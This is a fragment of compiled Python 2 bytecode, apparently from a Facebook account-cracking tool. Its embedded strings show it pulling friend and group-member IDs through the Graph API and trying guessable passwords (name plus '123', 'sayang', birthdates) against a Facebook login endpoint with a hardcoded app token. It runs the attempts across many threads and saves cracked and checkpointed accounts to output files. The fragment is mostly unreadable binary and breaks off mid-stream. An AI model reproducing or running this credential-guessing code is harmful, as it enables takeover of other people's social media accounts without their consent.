x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\x8a\x01d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nL\x05d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xd7\x01d\x19\x00GHd 
\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xff\x04|\x03\x00d!\x00\x19}\x07\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x07\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rS\x02d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x83\x04d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xa0\x02d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n6\x04|\x03\x00d"\x00\x19d#\x00\x17}\x08\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x08\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r \x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xb6\x03d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rm\x03d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01ni\x03|\x03\x00d$\x00\x19}\t\x00|\t\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\n\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\n\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xfb\x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xdb\x02d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rH\x04d\x19\x00GHd 
\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x8e\x02|\x03\x00d$\x00\x19}\x0b\x00|\x0b\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\x0c\x00|\x03\x00d\x13\x00\x19|\x0c\x00\x17}\r\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\r\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xe4\x04d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xf2\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r1\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xa5\x01d\'\x00}\x0e\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0e\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xa9\x05d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n-\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xf6\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xe0\x00d(\x00}\x0f\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0f\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rn\x06d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0f\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nh\x00d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xbb\x06d\x19\x00GHd 
\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x1b\x00d)\x00GHd*\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01Wn\'\x00\x04t\x15\x00k\n\x00r\x00\x07\x01\x01\x01d+\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(,\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00se\x00\x00\x00\x1b[1;97m[\x1b[1;91mINFO\x1b[1;97m] \x1b[1;91mThe target account must be friends\n with your account first!i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTarget ID \x1b[1;91m:\x1b[1;97m s,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s"\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : R0\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...i\x02\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mOpen password \x1b[1;97m...t\n\x00\x00\x00first_namet\x05\x00\x00\x0012345s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x17\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFounds4\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs$\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;93mAccount Checkpointt\x06\x00\x00\x00sayangt\t\x00\x00\x00last_namet\x03\x00\x00\x00123Ry\x00\x00\x00t\x01\x00\x00\x00/R\n\x00\x00\x00t\t\x00\x00\x00kontol123t\t\x00\x00\x00sayang123s7\x00\x00\x00\x1b[1;91m[!] Sorry, failed to open the target password :(s\x1e\x00\x00\x00\x1b[1;91m[!] try it another way.s\x1b\x00\x00\x00\x1b[1;91m[!] Terget not found(\x16\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadRv\x00\x00\x00R\x16\x00\x00\x00R,\x00\x00\x00(\x10\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00pz1Rl\x00\x00\x00Ro\x00\x00\x00t\x03\x00\x00\x00pz2t\x03\x00\x00\x00pz3t\x05\x00\x00\x00lahirt\x03\x00\x00\x00pz4t\x06\x00\x00\x00lahirst\x03\x00\x00\x00gazt\x03\x00\x00\x00pz5t\x03\x00\x00\x00pz6t\x03\x00\x00\x00pz7(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xab\x00\x00\x00\xe5\x03\x00\x00s@\x01\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x03\x01\x0c\x01\n\x01\x1b\x01\x12\x01\r\x01\n\x01\r\x01\n\x01\r\x01\t\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n
\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s6\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00a\n\x00t\t\x00d\x08\x00\x83\x01\x00a\x0b\x00y~\x00t\x02\x00t\n\x00d\x03\x00\x83\x02\x00a\x0c\x00t\r\x00d\t\x00\x83\x01\x00\x01xC\x00t\x0e\x00d\n\x00\x83\x01\x00D]5\x00}\x01\x00t\x0f\x00j\x10\x00d\x0b\x00t\x11\x00d\x0c\x00d\x0f\x00\x83\x00\x02}\x02\x00|\x02\x00j\x12\x00\x83\x00\x00\x01t\x13\x00j\x14\x00|\x02\x00\x83\x01\x00\x01q\xb3\x00Wx\x18\x00t\x13\x00D]\x10\x00}\x02\x00|\x02\x00j\x15\x00\x83\x00\x00\x01q\xf3\x00WWn\'\x00\x04t\x04\x00k\n\x00r1\x01\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97ms+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i(\x00\x00\x00t\x06\x00\x00\x00targett\x04\x00\x00\x00argss\x19\x00\x00\x00\x1b[1;91m[!] 
File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](\x00\x00\x00\x00(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00idlistt\x05\x00\x00\x00passwt\x04\x00\x00\x00fileR \x00\x00\x00t\x05\x00\x00\x00ranget\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x05\x00\x00\x00scrakt\x05\x00\x00\x00startt\x07\x00\x00\x00threadsR\x94\x00\x00\x00t\x04\x00\x00\x00joinRv\x00\x00\x00(\x03\x00\x00\x00R4\x00\x00\x00R\x10\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xac\x00\x00\x00\x98\x04\x00\x00s2\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x0f\x01\n\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sg\x02\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r$\x00\x01\x01\x01n\x01\x00Xy\xfd\x01t\x03\x00t\x04\x00d\x02\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00x\xd5\x01t\x08\x00r 
\x02t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x03\x00|\x01\x00\x17d\x04\x00\x17t\x0b\x00\x17d\x05\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x10\x00t\x11\x00t\x07\x00\x83\x01\x00k\x02\x00r\xae\x00Pn\x00\x00d\x06\x00|\x04\x00k\x06\x00rE\x01t\x03\x00d\x07\x00d\x08\x00\x83\x02\x00}\x05\x00|\x05\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00d\x06\x00\x19\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x16\x00|\x06\x00j\x17\x00\x83\x01\x00}\x07\x00t\x18\x00j\x19\x00d\r\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17d\x0e\x00\x17|\x07\x00d\x0f\x00\x19\x17\x83\x01\x00\x01nu\x00d\x10\x00|\x04\x00d\x11\x00\x19k\x06\x00r\xa3\x01t\x03\x00d\x12\x00d\x08\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01t\x1a\x00j\x19\x00d\x13\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17\x83\x01\x00\x01n\x17\x00t\x1b\x00j\x19\x00|\x01\x00\x83\x01\x00\x01t\x10\x00d\x14\x007a\x10\x00t\x1c\x00j\x1d\x00j\x12\x00d\x15\x00t\x1e\x00t\x10\x00\x83\x01\x00\x17d\x16\x00\x17t\x1e\x00t\x11\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17d\x17\x00\x17t\x1e\x00t\x11\x00t\x18\x00\x83\x01\x00\x83\x01\x00\x17d\x18\x00\x17t\x1e\x00t\x11\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x1c\x00j\x1d\x00j\x1f\x00\x83\x00\x00\x01qL\x00WWn>\x00\x04t 
\x00k\n\x00rG\x02\x01\x01\x01d\x19\x00GHt!\x00j"\x00d\x14\x00\x83\x01\x00\x01n\x1c\x00\x04t\x14\x00j#\x00j$\x00k\n\x00rb\x02\x01\x01\x01d\x1a\x00GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00NR\x90\x00\x00\x00R\'\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00out/mbf_ok.txtR\x11\x00\x00\x00t\x01\x00\x00\x00|s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m ] s\x03\x00\x00\x00 =>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x0e\x00\x00\x00out/mbf_cp.txts\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m ] i\x01\x00\x00\x00s<\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m s\x11\x00\x00\x00 \x1b[1;96m>\x1b[1;97m s\x1d\x00\x00\x00 =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96ms%\x00\x00\x00 \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96ms\x11\x00\x00\x00\n\x1b[1;91m[!] 
Sleeps\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(%\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R)\x00\x00\x00R\xca\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00splitt\x02\x00\x00\x00upR\xcc\x00\x00\x00t\x08\x00\x00\x00readlinet\x05\x00\x00\x00stripR\xcb\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00Rd\x00\x00\x00R\xbd\x00\x00\x00t\x04\x00\x00\x00backR\x0e\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00berhasilR\x94\x00\x00\x00t\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x06\x00\x00\x00R\x18\x00\x00\x00R\x17\x00\x00\x00R\x1b\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00(\t\x00\x00\x00t\x04\x00\x00\x00bukat\x08\x00\x00\x00usernameRk\x00\x00\x00Rl\x00\x00\x00t\x04\x00\x00\x00mpsht\x04\x00\x00\x00bisaR\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xd0\x00\x00\x00\xb4\x04\x00\x00sF\x00\x00\x00\x00\x02\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x01\x04\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x1f\x01\x12\x01(\x01\x10\x01\x0f\x01\x19\x01\n\x01\x1c\x02\r\x01\n\x01V\x00\x15\x01\r\x01\x05\x01\x10\x01\x13\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s_\x00\x00\x00Hd\x01\x00d\x02\x00\x14GHx\x13\x00t\x00\x00D]\x0b\x00}\x00\x00|\x00\x00GHq\x11\x00Wx\x13\x00t\x01\x00D]\x0b\x00}\x01\x00|\x01\x00GHq\'\x00Wd\x01\x00d\x02\x00\x14GHd\x03\x00t\x02\x00t\x03\x00t\x04\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ni*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00\x1b[31m[x] Failed \x1b[1;97m--> 
(\x06\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\xdc\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00c(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xad\x00\x00\x00\xda\x04\x00\x00s\x12\x00\x00\x00\x00\x01\x01\x01\t\x02\r\x01\t\x02\r\x01\t\x02\t\x01\x15\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x15\x00\x00\x001]. Crack list friends\x16\x00\x00\x002]. Crack from friends\x1b\x00\x00\x003]. Crack from member groups\x08\x00\x00\x000]. 
Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00pilih_super(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xae\x00\x00\x00\xe9\x04\x00\x00s \x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0f\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x84\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n|\x02|\x00\x00d\x04\x00k\x02\x00r\x9d\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x05\x00d\x06\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x07\x00t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x,\x02|\x02\x00d\x08\x00\x19D]\x17\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00d\t\x00\x19\x83\x01\x00\x01q\x7f\x00Wn\x06\x02|\x00\x00d\n\x00k\x02\x00r\x8f\x01t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x0b\x00\x83\x01\x00}\x04\x00y>\x00t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\r\x00\x17t\x08\x00\x17\x83\x01\x00}\x05\x00t\t\x00j\n\x00|\x05\x00j\x0b\x00\x83\x01\x00}\x06\x00d\x0e\x00|\x06\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r.\x01\x01\x01\x01d\x10\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x12\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\x13\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x:\x01|\x02\x00d\x08\x00\x19D]\x17\x00}\x07\x00t\x0c\x00j\r\x00|\x07\x00d\t\x00\x19\x83\x01\x00\x01qq\x01Wn\x14\x01|\x00\x00d\x14\x00k\x02\x00r\x81\x02t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x08\x00y>\x00t\x06\x00j\x07\x00d\x16\x00|\x08\x00\x17d\x17\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x
00}\t\x00d\x18\x00|\t\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r \x02\x01\x01\x01d\x19\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x08\x00\x17d\x1b\x00\x17t\x08\x00\x17\x83\x01\x00}\n\x00t\t\x00j\n\x00|\n\x00j\x0b\x00\x83\x01\x00}\x03\x00xH\x00|\x03\x00d\x08\x00\x19D]\x17\x00}\x0b\x00t\x0c\x00j\r\x00|\x0b\x00d\t\x00\x19\x83\x01\x00\x01qc\x02Wn"\x00|\x00\x00d\x1c\x00k\x02\x00r\x97\x02t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x1d\x00t\x11\x00t\x12\x00t\x0c\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00d 